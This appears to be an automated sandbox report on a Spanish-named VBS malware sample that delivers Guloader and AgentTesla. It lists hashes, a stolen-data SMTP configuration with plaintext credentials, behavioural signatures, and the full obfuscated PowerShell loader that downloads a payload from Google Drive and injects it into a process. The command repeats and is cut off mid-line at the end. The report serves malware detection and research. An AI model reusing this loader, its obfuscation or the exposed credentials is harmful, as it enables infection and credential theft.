Analysis
-
max time kernel
142s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-09-2024 14:08
Static task
static1
Behavioral task
behavioral1
Sample
Justificante_1305.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Justificante_1305.vbs
Resource
win10v2004-20240802-en
General
-
Target
Justificante_1305.vbs
-
Size
19KB
-
MD5
9b1f7ea12daa77c87447f05ff1ac6f5e
-
SHA1
58d9c2cb1c146a81412a308d1c6b6b8b6e31f1a4
-
SHA256
2e98277dc23d49726e32785822944fd82ad43068321e1b5ee7e5d1d8a8bc1bbc
-
SHA512
035a86675229744b63b5f0974164e12e6934a35074f59986b232bf4c6acda245bca34982b8c649ac934659e6af0e8e33ed7b049c58bda787ba9277956c06114b
-
SSDEEP
384:pQ3GOmBsxCnn+8jZHMfOOoq76ITBJQcO5I4xDIeiAD2F7sGk:639cs8n+0ej2OBJQczIT1
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
marcellinus360 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2236 WScript.exe 7 3024 powershell.exe 9 3024 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 11 drive.google.com 6 drive.google.com 7 drive.google.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 api.ipify.org 20 api.ipify.org -
pid Process 3024 powershell.exe 2212 cmd.exe 2300 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2940 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2300 powershell.exe 2940 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2300 set thread context of 2940 2300 powershell.exe 37 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wabmig.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2300 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3024 powershell.exe 2300 powershell.exe 2300 powershell.exe 2940 wabmig.exe 2940 wabmig.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 2940 wabmig.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2940 wabmig.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2236 wrote to memory of 3024 2236 WScript.exe 30 PID 2236 wrote to memory of 3024 2236 WScript.exe 30 PID 2236 wrote to memory of 3024 2236 WScript.exe 30 PID 3024 wrote to memory of 2852 3024 powershell.exe 32 PID 3024 wrote to memory of 2852 3024 powershell.exe 32 PID 3024 wrote to memory of 2852 3024 powershell.exe 32 PID 3024 wrote to memory of 2212 3024 powershell.exe 34 PID 3024 wrote to memory of 2212 3024 powershell.exe 34 PID 3024 wrote to memory of 2212 3024 powershell.exe 34 PID 2212 wrote to memory of 2300 2212 cmd.exe 35 PID 2212 wrote to memory of 2300 2212 cmd.exe 35 PID 2212 wrote to memory of 2300 2212 cmd.exe 35 PID 2212 wrote to memory of 2300 2212 cmd.exe 35 PID 2300 wrote to memory of 1264 2300 powershell.exe 36 PID 2300 wrote to memory of 1264 2300 powershell.exe 36 PID 2300 wrote to memory of 1264 2300 powershell.exe 36 PID 2300 wrote to memory of 1264 2300 powershell.exe 36 PID 2300 wrote to memory of 2940 2300 powershell.exe 37 PID 2300 wrote to memory of 2940 2300 powershell.exe 37 PID 2300 wrote to memory of 2940 2300 powershell.exe 37 PID 2300 wrote to memory of 2940 2300 powershell.exe 37 PID 2300 wrote to memory of 2940 2300 powershell.exe 37 PID 2300 wrote to memory of 2940 2300 powershell.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante_1305.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"2⤵
- Blocklisted process makes network request
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Potboiled.Asy && echo t"3⤵PID:2852
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"3⤵
- Network Service Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til 